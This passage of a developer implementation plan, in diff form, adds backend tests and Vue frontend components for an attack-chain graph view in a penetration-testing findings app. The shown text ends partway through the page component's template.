+    await _seed_with_relation(user_id, "rel-c4")
+
+    resp = await auth_client.patch(
+        "/api/chain/relations/rel-c4",
+        json={"status": "auto_confirmed"},
+    )
+    assert resp.status_code == 422
+
+
+@pytest.mark.asyncio
+async def test_nonexistent_relation_returns_404(auth_client):
+    """Patching a nonexistent relation returns 404."""
+    resp = await auth_client.patch(
+        "/api/chain/relations/rel-does-not-exist",
+        json={"status": "user_confirmed"},
+    )
+    assert resp.status_code == 404
+
+
+@pytest.mark.asyncio
+async def test_confirm_snapshots_reasons(auth_client):
+    """Confirming snapshots reasons_json into confirmed_at_reasons_json."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_with_relation(user_id, "rel-c5", status="candidate")
+
+    await auth_client.patch(
+        "/api/chain/relations/rel-c5",
+        json={"status": "user_confirmed"},
+    )
+
+    # Verify in DB
+    async with test_session_factory() as session:
+        from sqlalchemy import select
+        result = await session.execute(
+            select(ChainFindingRelation).where(ChainFindingRelation.id == "rel-c5")
+        )
+        rel = result.scalar_one()
+        assert rel.confirmed_at_reasons_json is not None
+        assert rel.confirmed_at_reasons_json == rel.reasons_json
+
+
+@pytest.mark.asyncio
+async def test_unauthenticated_returns_401(client):
+    """Unauthenticated curation request returns 401."""
+    resp = await client.patch(
+        "/api/chain/relations/rel-x",
+        json={"status": "user_confirmed"},
+    )
+    assert resp.status_code == 401
+```
+
+- [ ] **Step 2: Run the tests**
+
+Run: `cd packages/web/backend && python -m pytest tests/test_chain_curation.py -v`
+Expected: all tests PASS
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add packages/web/backend/tests/test_chain_curation.py
+git commit -m "test(chain): curation endpoint tests — transitions, validation, auth"
+```
+
+---
+
+## Task 7: Frontend — Install `force-graph` and add route
+
+**Files:**
+- Modify: `packages/web/frontend/package.json` (via npm)
+- Modify: `packages/web/frontend/src/router/index.ts`
+- Modify: `packages/web/frontend/src/views/EngagementDetailView.vue`
+
+- [ ] **Step 1: Install force-graph**
+
+Run: `cd packages/web/frontend && npm install force-graph`
+
+- [ ] **Step 2: Add the chain route to router**
+
+In `packages/web/frontend/src/router/index.ts`, add after the `finding-detail` route:
+
+```typescript
+    { path: '/engagements/:id/chain', name: 'engagement-chain', component: () => import('@/views/ChainGraphView.vue') },
+```
+
+- [ ] **Step 3: Add "View Attack Chain" button to EngagementDetailView**
+
+In `packages/web/frontend/src/views/EngagementDetailView.vue`, add a button next to the existing Delete button in the header:
+
+Find the `<Button label="Delete"` block and add before it:
+
+```vue
+      <div class="flex gap-2">
+        <Button
+          label="Attack Chain"
+          icon="pi pi-share-alt"
+          outlined
+          @click="router.push(`/engagements/${engId}/chain`)"
+        />
+        <Button
+          label="Delete"
+          ...existing props...
+        />
+      </div>
+```
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add packages/web/frontend/package.json packages/web/frontend/package-lock.json
+git add packages/web/frontend/src/router/index.ts
+git add packages/web/frontend/src/views/EngagementDetailView.vue
+git commit -m "feat(frontend): install force-graph, add chain route and nav button"
+```
+
+---
+
+## Task 8: Frontend — `ChainFilterToolbar.vue`
+
+**Files:**
+- Create: `packages/web/frontend/src/components/ChainFilterToolbar.vue`
+
+- [ ] **Step 1: Create the filter toolbar component**
+
+Create `packages/web/frontend/src/components/ChainFilterToolbar.vue`:
+
+```vue
+<script setup lang="ts">
+import { ref, watch } from 'vue'
+import SelectButton from 'primevue/selectbutton'
+import Button from 'primevue/button'
+
+const emit = defineEmits<{
+  (e: 'filter-change', filters: { severities: string[]; statuses: string[] }): void
+}>()
+
+const severityOptions = ['critical', 'high', 'medium', 'low', 'info']
+const statusOptions = [
+  { label: 'Confirmed', value: 'auto_confirmed,user_confirmed' },
+  { label: 'Candidate', value: 'candidate' },
+  { label: 'Rejected', value: 'rejected,user_rejected' },
+]
+
+const selectedSeverities = ref([...severityOptions])
+const selectedStatuses = ref(['auto_confirmed,user_confirmed', 'candidate'])
+
+function emitFilters() {
+  const statuses = selectedStatuses.value.flatMap(s => s.split(','))
+  emit('filter-change', {
+    severities: selectedSeverities.value,
+    statuses,
+  })
+}
+
+watch([selectedSeverities, selectedStatuses], emitFilters, { deep: true })
+
+function reset() {
+  selectedSeverities.value = [...severityOptions]
+  selectedStatuses.value = ['auto_confirmed,user_confirmed', 'candidate']
+}
+</script>
+
+<template>
+  <div class="flex items-center gap-3 flex-wrap">
+    <SelectButton
+      v-model="selectedSeverities"
+      :options="severityOptions"
+      multiple
+      :allow-empty="false"
+    />
+    <span class="text-surface-400">|</span>
+    <SelectButton
+      v-model="selectedStatuses"
+      :options="statusOptions"
+      option-label="label"
+      option-value="value"
+      multiple
+      :allow-empty="false"
+    />
+    <Button icon="pi pi-refresh" text rounded size="small" @click="reset" v-tooltip="'Reset filters'" />
+  </div>
+</template>
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add packages/web/frontend/src/components/ChainFilterToolbar.vue
+git commit -m "feat(frontend): ChainFilterToolbar — severity and status toggles"
+```
+
+---
+
+## Task 9: Frontend — `ChainLegend.vue`
+
+**Files:**
+- Create: `packages/web/frontend/src/components/ChainLegend.vue`
+
+- [ ] **Step 1: Create the legend component**
+
+Create `packages/web/frontend/src/components/ChainLegend.vue`:
+
+```vue
+<script setup lang="ts">
+defineProps<{
+  renderedCount: number
+  totalCount: number
+}>()
+
+const severities = [
+  { label: 'Critical', color: '#e74c3c' },
+  { label: 'High', color: '#e67e22' },
+  { label: 'Medium', color: '#f1c40f' },
+  { label: 'Low', color: '#3498db' },
+  { label: 'Info', color: '#95a5a6' },
+]
+</script>
+
+<template>
+  <div class="flex items-center justify-between px-4 py-2 border-t border-surface-200 dark:border-surface-700 text-sm">
+    <div class="flex items-center gap-4">
+      <div v-for="s in severities" :key="s.label" class="flex items-center gap-1">
+        <span class="inline-block w-3 h-3 rounded-full" :style="{ backgroundColor: s.color }" />
+        <span>{{ s.label }}</span>
+      </div>
+      <span class="text-surface-400 mx-1">|</span>
+      <span>── Confirmed</span>
+      <span>╌╌ Candidate</span>
+    </div>
+    <div class="text-surface-500">
+      Showing {{ renderedCount }} of {{ totalCount }}
+    </div>
+  </div>
+</template>
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add packages/web/frontend/src/components/ChainLegend.vue
+git commit -m "feat(frontend): ChainLegend — severity colors, edge styles, node count"
+```
+
+---
+
+## Task 10: Frontend — `ChainEmptyState.vue`
+
+**Files:**
+- Create: `packages/web/frontend/src/components/ChainEmptyState.vue`
+
+- [ ] **Step 1: Create the empty state component**
+
+Create `packages/web/frontend/src/components/ChainEmptyState.vue`:
+
+```vue
+<script setup lang="ts">
+import { ref } from 'vue'
+import Button from 'primevue/button'
+import ProgressBar from 'primevue/progressbar'
+import { useToast } from 'primevue/usetoast'
+
+const props = defineProps<{ engagementId: string }>()
+const emit = defineEmits<{ (e: 'rebuild-complete'): void }>()
+const toast = useToast()
+
+const rebuilding = ref(false)
+const pollTimer = ref<ReturnType<typeof setInterval> | null>(null)
+
+async function startRebuild() {
+  rebuilding.value = true
+  try {
+    const resp = await fetch('/api/chain/rebuild', {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      credentials: 'include',
+      body: JSON.stringify({ engagement_id: props.engagementId }),
+    })
+    if (!resp.ok) throw new Error('Failed to start rebuild')
+    const { run_id } = await resp.json()
+    pollStatus(run_id)
+  } catch {
+    rebuilding.value = false
+    toast.add({ severity: 'error', summary: 'Error', detail: 'Failed to start chain analysis', life: 5000 })
+  }
+}
+
+function pollStatus(runId: string) {
+  pollTimer.value = setInterval(async () => {
+    try {
+      const resp = await fetch(`/api/chain/runs/${runId}`, { credentials: 'include' })
+      if (!resp.ok) return
+      const run = await resp.json()
+      if (run.status === 'done' || run.status === 'completed') {
+        clearInterval(pollTimer.value!)
+        pollTimer.value = null
+        rebuilding.value = false
+        emit('rebuild-complete')
+      } else if (run.status === 'failed' || run.status === 'error') {
+        clearInterval(pollTimer.value!)
+        pollTimer.value = null
+        rebuilding.value = false
+        toast.add({ severity: 'error', summary: 'Analysis Failed', detail: run.error || 'Unknown error', life: 5000 })
+      }
+    } catch {
+      // Silently retry on network error
+    }
+  }, 2000)
+}
+</script>
+
+<template>
+  <div class="flex flex-col items-center justify-center h-full gap-4">
+    <i class="pi pi-share-alt text-6xl text-surface-300" />
+    <h2 class="text-xl font-semibold text-surface-500">No attack chain data yet</h2>
+    <p class="text-surface-400">Run chain analysis to extract relationships between findings.</p>
+    <Button
+      v-if="!rebuilding"
+      label="Run Chain Analysis"
+      icon="pi pi-play"
+      @click="startRebuild"
+    />
+    <div v-else class="w-64">
+      <ProgressBar mode="indeterminate" />
+      <p class="text-sm text-surface-400 text-center mt-2">Analyzing findings…</p>
+    </div>
+  </div>
+</template>
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add packages/web/frontend/src/components/ChainEmptyState.vue
+git commit -m "feat(frontend): ChainEmptyState — rebuild trigger with progress polling"
+```
+
+---
+
+## Task 11: Frontend — `ChainDetailPanel.vue`
+
+**Files:**
+- Create: `packages/web/frontend/src/components/ChainDetailPanel.vue`
+
+- [ ] **Step 1: Create the detail panel component**
+
+Create `packages/web/frontend/src/components/ChainDetailPanel.vue`:
+
+```vue
+<script setup lang="ts">
+import { computed } from 'vue'
+import Button from 'primevue/button'
+import Tag from 'primevue/tag'
+import SeverityBadge from '@/components/SeverityBadge.vue'
+
+interface GraphNode {
+  id: string
+  name: string
+  severity: string
+  tool: string
+  phase: string | null
+  neighborCount?: number
+}
+
+interface GraphLink {
+  id: string
+  source: string | { id: string }
+  target: string | { id: string }
+  value: number
+  status: string
+  drift: boolean
+  reasons: string[]
+  relation_type: string | null
+  rationale: string | null
+}
+
+const props = defineProps<{
+  selectedNode: GraphNode | null
+  selectedLink: GraphLink | null
+  nodes: GraphNode[]
+}>()
+
+const emit = defineEmits<{
+  (e: 'close'): void
+  (e: 'confirm', linkId: string): void
+  (e: 'reject', linkId: string): void
+  (e: 'expand', nodeId: string): void
+}>()
+
+const isOpen = computed(() => props.selectedNode !== null || props.selectedLink !== null)
+
+// Resolve link source/target to node objects for display
+function findNode(ref: string | { id: string }): GraphNode | undefined {
+  const id = typeof ref === 'string' ? ref : ref.id
+  return props.nodes.find(n => n.id === id)
+}
+
+const sourceNode = computed(() => props.selectedLink ? findNode(props.selectedLink.source) : null)
+const targetNode = computed(() => props.selectedLink ? findNode(props.selectedLink.target) : null)
+
+const statusLabel: Record<string, string> = {
+  auto_confirmed: 'Auto Confirmed',
+  user_confirmed: 'Confirmed',
+  candidate: 'Candidate',
+  rejected: 'Rejected',
+  user_rejected: 'Rejected',
+}
+
+const statusSeverity: Record<string, string> = {
+  auto_confirmed: 'success',
+  user_confirmed: 'success',
+  candidate: 'warn',
+  rejected: 'danger',
+  user_rejected: 'danger',
+}
+</script>
+
+<template>
+  <div
+    v-if="isOpen"
+    class="w-80 border-l border-surface-200 dark:border-surface-700 overflow-y-auto p-4 flex flex-col gap-4"
+  >
+    <div class="flex justify-between items-center">
+      <h3 class="font-semibold text-lg">
+        {{ selectedNode ? 'Finding' : 'Relationship' }}
+      </h3>
+      <Button icon="pi pi-times" text rounded size="small" @click="emit('close')" />
+    </div>
+
+    <!-- Node details -->
+    <template v-if="selectedNode">
+      <div class="flex flex-col gap-2">
+        <p class="font-medium">{{ selectedNode.name }}</p>
+        <div class="flex items-center gap-2">
+          <SeverityBadge :severity="selectedNode.severity" />
+          <span class="text-sm text-surface-500">{{ selectedNode.tool }}</span>
+        </div>
+        <div v-if="selectedNode.phase" class="text-sm">
+          <span class="text-surface-400">Phase:</span> {{ selectedNode.phase }}
+        </div>
+      </div>
+      <Button
+        :label="`Expand ${selectedNode.neighborCount ?? '?'} Neighbors`"
+        icon="pi pi-arrows-alt"
+        outlined
+        size="small"
+        @click="emit('expand', selectedNode.id)"
+      />
+    </template>
+
+    <!-- Link details -->
+    <template v-if="selectedLink">
+      <div class="flex flex-col gap-2">
+        <div class="text-sm">
+          <span class="font-medium">{{ sourceNode?.name ?? '?' }}</span>
+          <span class="text-surface-400 mx-1">→</span>
+          <span class="font-medium">{{ targetNode?.name ?? '?' }}</span>
+        </div>
+
+        <div class="flex items-center gap-2">
+          <Tag
+            :value="statusLabel[selectedLink.status] ?? selectedLink.status"
+            :severity="statusSeverity[selectedLink.status] ?? 'secondary'"
+          />
+          <span class="text-sm text-surface-500">Weight: {{ selectedLink.value.toFixed(2) }}</span>
+        </div>
+
+        <!-- Drift warning -->
+        <div v-if="selectedLink.drift" class="flex items-center gap-2 p-2 bg-yellow-50 dark:bg-yellow-900/20 rounded text-sm">
+          <i class="pi pi-exclamation-triangle text-yellow-500" />
+          <span>Reasoning changed since you confirmed this edge.</span>
+        </div>
+
+        <!-- Reasons -->
+        <div>
+          <p class="text-sm font-medium text-surface-400 mb-1">Rules fired:</p>
+          <ul class="text-sm flex flex-col gap-1">
+            <li v-for="reason in selectedLink.reasons" :key="reason" class="flex items-center gap-1">
+              <i class="pi pi-check-circle text-surface-400 text-xs" />
+              {{ reason }}
+            </li>
+          </ul>
+        </div>
+
+        <!-- LLM rationale -->
+        <div v-if="selectedLink.rationale">
+          <p class="text-sm font-medium text-surface-400 mb-1">LLM rationale:</p>
+          <p class="text-sm bg-surface-50 dark:bg-surface-800 p-2 rounded">{{ selectedLink.rationale }}</p>
+        </div>
+
+        <!-- Relation type -->
+        <div v-if="selectedLink.relation_type" class="text-sm">
+          <span class="text-surface-400">Type:</span> {{ selectedLink.relation_type }}
+        </div>
+      </div>
+
+      <!-- Curation buttons -->
+      <div class="flex gap-2 mt-2">
+        <Button
+          label="Confirm"
+          icon="pi pi-check"
+          severity="success"
+          size="small"
+          :disabled="selectedLink.status === 'user_confirmed'"
+          @click="emit('confirm', selectedLink.id)"
+        />
+        <Button
+          label="Reject"
+          icon="pi pi-times"
+          severity="danger"
+          size="small"
+          outlined
+          :disabled="selectedLink.status === 'user_rejected'"
+          @click="emit('reject', selectedLink.id)"
+        />
+      </div>
+    </template>
+  </div>
+</template>
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add packages/web/frontend/src/components/ChainDetailPanel.vue
+git commit -m "feat(frontend): ChainDetailPanel — node/edge details with curation buttons"
+```
+
+---
+
+## Task 12: Frontend — `ForceGraphCanvas.vue`
+
+**Files:**
+- Create: `packages/web/frontend/src/components/ForceGraphCanvas.vue`
+
+This is the core rendering component wrapping the `force-graph` library.
+
+- [ ] **Step 1: Create the force-graph wrapper component**
+
+Create `packages/web/frontend/src/components/ForceGraphCanvas.vue`:
+
+```vue
+<script setup lang="ts">
+import { ref, onMounted, onUnmounted, watch, nextTick } from 'vue'
+import ForceGraph from 'force-graph'
+
+interface GraphNode {
+  id: string
+  name: string
+  severity: string
+  tool: string
+  phase: string | null
+  x?: number
+  y?: number
+  fx?: number | null
+  fy?: number | null
+  neighborCount?: number
+}
+
+interface GraphLink {
+  id: string
+  source: string | GraphNode
+  target: string | GraphNode
+  value: number
+  status: string
+  drift: boolean
+  reasons: string[]
+  relation_type: string | null
+  rationale: string | null
+}
+
+interface GraphData {
+  nodes: GraphNode[]
+  links: GraphLink[]
+}
+
+const props = defineProps<{
+  data: GraphData
+  selectedNodeId: string | null
+  selectedLinkId: string | null
+}>()
+
+const emit = defineEmits<{
+  (e: 'node-click', node: GraphNode): void
+  (e: 'link-click', link: GraphLink): void
+  (e: 'background-click'): void
+}>()
+
+const container = ref<HTMLDivElement | null>(null)
+let graph: any = null
+
+const SEVERITY_COLORS: Record<string, string> = {
+  critical: '#e74c3c',
+  high: '#e67e22',
+  medium: '#f1c40f',
+  low: '#3498db',
+  info: '#95a5a6',
+}
+
+const MITRE_ABBREVS: Record<string, string> = {
+  'reconnaissance': 'RE',
+  'resource-development': 'RD',
+  'initial-access': 'IA',
+  'execution': 'EX',
+  'persistence': 'PE',
+  'privilege-escalation': 'PR',
+  'defense-evasion': 'DE',
+  'credential-access': 'CA',
+  'discovery': 'DI',
+  'lateral-movement': 'LM',
+  'collection': 'CO',
+  'command-and-control': 'C2',
+  'exfiltration': 'EF',
+  'impact': 'IM',
+}
+
+function getNodeId(ref: string | GraphNode): string {
+  return typeof ref === 'string' ? ref : ref.id
+}
+
+function initGraph() {
+  if (!container.value) return
+
+  graph = ForceGraph()(container.value)
+    .graphData(props.data)
+    .nodeId('id')
+    .linkSource('source')
+    .linkTarget('target')
+    .nodeCanvasObject((node: any, ctx: CanvasRenderingContext2D, globalScale: number) => {
+      const n = node as GraphNode
+      const links = props.data.links
+      const connCount = links.filter(l => getNodeId(l.source) === n.id || getNodeId(l.target) === n.id).length
+      const radius = Math.min(4 + connCount * 0.8, 12)
+      const color = SEVERITY_COLORS[n.severity] || '#95a5a6'
+      const isSelected = n.id === props.selectedNodeId
+
+      // Circle
+      ctx.beginPath()
+      ctx.arc(node.x, node.y, radius, 0, 2 * Math.PI)
+      ctx.fillStyle = color
+      ctx.fill()
+
+      // Selection ring
+      if (isSelected) {
+        ctx.strokeStyle = '#ffffff'
+        ctx.lineWidth = 2 / globalScale
+        ctx.stroke()
+        ctx.strokeStyle = color
+        ctx.lineWidth = 1 / globalScale
+        ctx.stroke()
+      }
+
+      // Label (visible at medium+ zoom)
+      if (globalScale > 1.5) {
+        const label = n.name.length > 30 ? n.name.slice(0, 27) + '…' : n.name
+        ctx.font = `${10 / globalScale}px sans-serif`
+        ctx.textAlign = 'center'
+        ctx.textBaseline = 'top'
+        ctx.fillStyle = '#666'
+        ctx.fillText(label, node.x, node.y + radius + 2 / globalScale)
+      }
+
+      // MITRE phase pill (visible at medium+ zoom)
+      if (n.phase && globalScale > 2) {
+        const abbrev = MITRE_ABBREVS[n.phase] || n.phase.slice(0, 2).toUpperCase()
+        const pillX = node.x + radius
+        const pillY = node.y - radius
+        ctx.font = `bold ${7 / globalScale}px sans-serif`
+        const textWidth = ctx.measureText(abbrev).width
+        const padding = 2 / globalScale
+
+        ctx.fillStyle = 'rgba(0,0,0,0.6)'
+        ctx.beginPath()
+        ctx.roundRect(pillX - padding, pillY - 4 / globalScale - padding, textWidth + padding * 2, 8 / globalScale + padding * 2, 2 / globalScale)
+        ctx.fill()
+
+        ctx.fillStyle = '#fff'
+        ctx.textAlign = 'left'
+        ctx.textBaseline = 'middle'
+        ctx.fillText(abbrev, pillX, pillY)
+      }
+    })
+    .nodePointerAreaPaint((node: any, color: string, ctx: CanvasRenderingContext2D) => {
+      const connCount = props.data.links.filter(l => getNodeId(l.source) === node.id || getNodeId(l.target) === node.id).length
+      const radius = Math.min(4 + connCount * 0.8, 12)
+      ctx.beginPath()
+      ctx.arc(node.x, node.y, radius + 2, 0, 2 * Math.PI)
+      ctx.fillStyle = color
+      ctx.fill()
+    })
+    .linkCanvasObject((link: any, ctx: CanvasRenderingContext2D, globalScale: number) => {
+      const l = link as GraphLink
+      const src = link.source
+      const tgt = link.target
+      if (!src.x || !tgt.x) return
+
+      const isSelected = l.id === props.selectedLinkId
+
+      ctx.beginPath()
+      ctx.moveTo(src.x, src.y)
+      ctx.lineTo(tgt.x, tgt.y)
+
+      // Style by status
+      const isConfirmed = l.status === 'auto_confirmed' || l.status === 'user_confirmed'
+      const isCandidate = l.status === 'candidate'
+      const isRejected = l.status === 'rejected' || l.status === 'user_rejected'
+
+      if (isRejected) {
+        ctx.strokeStyle = 'rgba(231, 76, 60, 0.4)'
+        ctx.setLineDash([4 / globalScale, 4 / globalScale])
+        ctx.lineWidth = (isSelected ? 2 : 0.5) / globalScale
+      } else if (isCandidate) {
+        ctx.strokeStyle = `rgba(100, 100, 100, ${0.3 + l.value * 0.3})`
+        ctx.setLineDash([4 / globalScale, 4 / globalScale])
+        ctx.lineWidth = (isSelected ? 2 : 1) / globalScale
+      } else {
+        const opacity = l.status === 'user_confirmed' ? 1 : 0.4 + l.value * 0.6
+        ctx.strokeStyle = `rgba(80, 80, 80, ${opacity})`
+        ctx.setLineDash([])
+        ctx.lineWidth = (isSelected ? 2.5 : l.status === 'user_confirmed' ? 1.5 : 1) / globalScale
+      }
+
+      ctx.stroke()
+      ctx.setLineDash([])
+
+      // Arrowhead
+      const angle = Math.atan2(tgt.y - src.y, tgt.x - src.x)
+      const arrowLen = 6 / globalScale
+      const connCount = props.data.links.filter(lk => getNodeId(lk.source) === getNodeId(l.target) || getNodeId(lk.target) === getNodeId(l.target)).length
+      const tgtRadius = Math.min(4 + connCount * 0.8, 12)
+      const endX = tgt.x - Math.cos(angle) * tgtRadius
+      const endY = tgt.y - Math.sin(angle) * tgtRadius
+      ctx.beginPath()
+      ctx.moveTo(endX, endY)
+      ctx.lineTo(endX - arrowLen * Math.cos(angle - Math.PI / 6), endY - arrowLen * Math.sin(angle - Math.PI / 6))
+      ctx.lineTo(endX - arrowLen * Math.cos(angle + Math.PI / 6), endY - arrowLen * Math.sin(angle + Math.PI / 6))
+      ctx.closePath()
+      ctx.fillStyle = ctx.strokeStyle
+      ctx.fill()
+
+      // Drift badge
+      if (l.drift) {
+        const midX = (src.x + tgt.x) / 2
+        const midY = (src.y + tgt.y) / 2
+        ctx.font = `${10 / globalScale}px sans-serif`
+        ctx.fillStyle = '#f59e0b'
+        ctx.textAlign = 'center'
+        ctx.textBaseline = 'middle'
+        ctx.fillText('▲', midX, midY)
+      }
+    })
+    .linkPointerAreaPaint((link: any, color: string, ctx: CanvasRenderingContext2D) => {
+      const src = link.source
+      const tgt = link.target
+      if (!src.x || !tgt.x) return
+      ctx.beginPath()
+      ctx.moveTo(src.x, src.y)
+      ctx.lineTo(tgt.x, tgt.y)
+      ctx.lineWidth = 8
+      ctx.strokeStyle = color
+      ctx.stroke()
+    })
+    .onNodeClick((node: any) => emit('node-click', node))
+    .onLinkClick((link: any) => emit('link-click', link))
+    .onBackgroundClick(() => emit('background-click'))
+    .cooldownTicks(100)
+    .warmupTicks(50)
+
+  // Zoom to fit after initial layout
+  setTimeout(() => graph?.zoomToFit(400, 50), 500)
+}
+
+function updateData(newData: GraphData) {
+  if (!graph) return
+
+  // Preserve positions of existing nodes
+  const oldNodes = graph.graphData().nodes as GraphNode[]
+  const posMap = new Map<string, { x: number; y: number }>()
+  for (const n of oldNodes) {
+    if (n.x !== undefined && n.y !== undefined) {
+      posMap.set(n.id, { x: n.x, y: n.y })
+    }
+  }
+
+  for (const n of newData.nodes) {
+    const pos = posMap.get(n.id)
+    if (pos) {
+      n.x = pos.x
+      n.y = pos.y
+      n.fx = pos.x
+      n.fy = pos.y
+      // Unpin after short delay to let simulation settle
+      setTimeout(() => {
+        n.fx = null
+        n.fy = null
+      }, 1000)
+    }
+  }
+
+  graph.graphData(newData)
+}
+
+watch(() => props.data, (newData) => {
+  if (graph) {
+    updateData(newData)
+  }
+}, { deep: true })
+
+onMounted(() => {
+  nextTick(() => initGraph())
+})
+
+onUnmounted(() => {
+  if (graph) {
+    graph._destructor?.()
+    graph = null
+  }
+})
+
+function resize() {
+  if (graph && container.value) {
+    graph.width(container.value.clientWidth)
+    graph.height(container.value.clientHeight)
+  }
+}
+
+defineExpose({ resize })
+</script>
+
+<template>
+  <div ref="container" class="w-full h-full" />
+</template>
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add packages/web/frontend/src/components/ForceGraphCanvas.vue
+git commit -m "feat(frontend): ForceGraphCanvas — force-graph wrapper with custom rendering"
+```
+
+---
+
+## Task 13: Frontend — `ChainGraphView.vue` (page component)
+
+**Files:**
+- Create: `packages/web/frontend/src/views/ChainGraphView.vue`
+
+This is the top-level page component that ties everything together.
+
+- [ ] **Step 1: Create the page component**
+
+Create `packages/web/frontend/src/views/ChainGraphView.vue`:
+
+```vue
+<script setup lang="ts">
+import { ref, computed, watch } from 'vue'
+import { useRoute, useRouter } from 'vue-router'
+import { useQuery, useMutation, useQueryClient } from '@tanstack/vue-query'
+import Button from 'primevue/button'
+import ProgressSpinner from 'primevue/progressspinner'
+import { useToast } from 'primevue/usetoast'
+
+import ForceGraphCanvas from '@/components/ForceGraphCanvas.vue'
+import ChainDetailPanel from '@/components/ChainDetailPanel.vue'
+import ChainFilterToolbar from '@/components/ChainFilterToolbar.vue'
+import ChainLegend from '@/components/ChainLegend.vue'
+import ChainEmptyState from '@/components/ChainEmptyState.vue'
+
+const route = useRoute()
+const router = useRouter()
+const toast = useToast()
+const queryClient = useQueryClient()
+
+const engId = route.params.id as string
+
+// Filter state
+const filters = ref({ severities: [] as string[], statuses: [] as string[] })
+
+function onFilterChange(f: { severities: string[]; statuses: string[] }) {
+  filters.value = f
+}
+
+// Build query params
+const queryParams = computed(() => {
+  const params = new URLSearchParams({ engagement_id: engId, max_nodes: '500' })
+  if (filters.value.severities.length > 0 && filters.value.severities.length < 5) {
+    params.set('severity', filters.value.severities.join(','))
+  }
+  if (filters.value.statuses.length > 0) {
+    params.set('status', filters.value.statuses.join(','))
+  }
+  return params.toString()
+})
+
+// Fetch subgraph
+const { data: subgraphData, isLoading, refetch } = useQuery({
+  queryKey: ['chain-subgraph', engId, queryParams],
+  queryFn: () =>
+    fetch(`/api/chain/subgraph?${queryParams.value}`, { credentials: 'include' })
+      .then(r => {
+        if (!r.ok) throw new Error('Failed to fetch subgraph')
+        return r.json()
+      }),
+})
+
+const graphData = computed(() => subgraphData.value?.graph ?? { nodes: [], links: [] })
+const meta = computed(() => subgraphData.value?.meta ?? { total_findings: 0, rendered_findings: 0, filtered: false, generation: 0 })
+const isEmpty = computed(() => !isLoading.value && meta.value.total_findings === 0)
+const hasNoRelations = computed(() => !isLoading.value && meta.value.total_findings > 0 && graphData.value.links.length === 0 && graphData.value.nodes.length === 0)
+
+// Selection state
+const selectedNode = ref<any>(null)
+const selectedLink = ref<any>(null)
+
+function onNodeClick(node: any) {
+  selectedLink.value = null
+  selectedNode.value = {
+    ...node,
+    neighborCount: graphData.value.links.filter(
+      (l: any) => {
+        const srcId = typeof l.source === 'string' ? l.source : l.source.id
+        const tgtId = typeof l.target === 'string' ? l.target : l.target.id
+        return srcId === node.id || tgtId === node.id
+      }
+    ).length,
+  }
+}
+
+function onLinkClick(link: any) {
+  selectedNode.value = null
+  selectedLink.value = link
+}
+
+function onBackgroundClick() {
+  selectedNode.value = null
+  selectedLink.value = null
+}
+
+// Curation mutation
+const curateMutation = useMutation({
+  mutationFn: ({ relationId, status }: { relationId: string; status: string }) =>
+    fetch(`/api/chain/relations/${relationId}`, {
+      method: 'PATCH',
+      headers: { 'Content-Type': 'application/json' },
+      credentials: 'include',
+      body: JSON.stringify({ status }),
+    }).then(r => {
+      if (!r.ok) throw new Error('Curation failed')
+      return r.json()
+    }),
+  onSuccess: (data, variables) => {
+    // Optimistic update: update the link in local graph data
+    const link = graphData.value.links.find((l: any) => l.id === variables.relationId)
+    if (link) {
+      link.status = variables.status
+      if (variables.status === 'user_confirmed') {
+        link.drift = false
+      }
+    }
+    if (selectedLink.value?.id === variables.relationId) {
+      selectedLink.value = { ...selectedLink.value, status: variables.status }
+    }
+    toast.add({ severity: 'success', summary: 'Updated', detail: `Edge ${variables.status === 'user_confirmed' ? 'confirmed' : 'rejected'}`, life: 2000 })
+  },
+  onError: () => {
+    toast.add({ severity: 'error', summary: 'Error', detail: 'Failed to update edge', life: 3000 })
+  },
+})
+
+function onConfirm(linkId: string) {
+  curateMutation.mutate({ relationId: linkId, status: 'user_confirmed' })
+}
+
+function onReject(linkId: string) {
+  curateMutation.mutate({ relationId: linkId, status: 'user_rejected' })
+}
+
+// Neighborhood expansion
+async function onExpand(nodeId: string) {
+  try {
+    const params = new URLSearchParams({
+      engagement_id: engId,
+      seed_finding_id: nodeId,
+      hops: '2',
+      max_nodes: '500',
+    })
+    if (filters.value.severities.length > 0 && filters.value.severities.length < 5) {
+      params.set('severity', filters.value.severities.join(','))
+    }
+    if (filters.value.statuses.length > 0) {
+      params.set('status', filters.value.statuses.join(','))
+    }
+    const resp = await fetch(`/api/chain/subgraph?${params}`, { credentials: 'include' })
+    if (!resp.ok) throw new Error('Failed to expand')
+    const expansion = await resp.json()
+
+    // Merge into existing graph data
+    const existingNodeIds = new Set(graphData.value.nodes.map((n: any) => n.id))
+    const existingLinkIds = new Set(graphData.value.links.map((l: any) => l.id))
+
+    for (const node of expansion.graph.nodes) {
+      if (!existingNodeIds.has(node.id)) {
+        graphData.value.nodes.push(node)
+      }
+    }
+    for (const link of expansion.graph.links) {
+      if (!existingLinkIds.has(link.id)) {
+        graphData.value.links.push(link)
+      }
+    }
+
+    toast.add({ severity: 'info', summary: 'Expanded', detail: `Added ${expansion.graph.nodes.length} nodes`, life: 2000 })
+  } catch {
+    toast.add({ severity: 'error', summary: 'Error', detail: 'Failed to expand neighborhood', life: 3000 })
+  }
+}
+
+function onRebuildComplete() {
+  refetch()
+}
+
+// Engagement name for header
+const { data: engagement } = useQuery({
+  queryKey: ['engagement', engId],
+  queryFn: () =>
+    fetch(`/api/v1/engagements/${engId}`, { credentials: 'include' }).then(r => r.json()),
+})
+</script>
+
+<template>
+  <div class="flex flex-col h-screen">
+    <!-- Toolbar -->
+    <div class="flex items-center gap-3 p-3 border-b border-surface-200 dark:border-surface-700">
+      <Button icon="pi pi-arrow-left" text rounded @click="router.push(`/engagements/${engId}`)" />
+      <h1 class="text-lg font-bold">{{ engagement?.name ?? 'Attack Chain' }}</h1>
+      <div class="flex-1">
+        <ChainFilterToolbar @filter-change="onFilterChange" />
+      </div>
+    </div>
+
+    <!-- Main content -->
+    <div v-if="isLoading" class="flex-1 flex items-center justify-center">
+      <ProgressSpinner />
+    </div>
+
+    <template v-else-if="isEmpty || hasNoRelations">
+      <ChainEmptyState :engagement-id="engId" @rebuild-complete="onRebuildComplete" />
+    </template>
+
+    <template v-else>
+      <div class="flex flex-1 overflow-hidden">
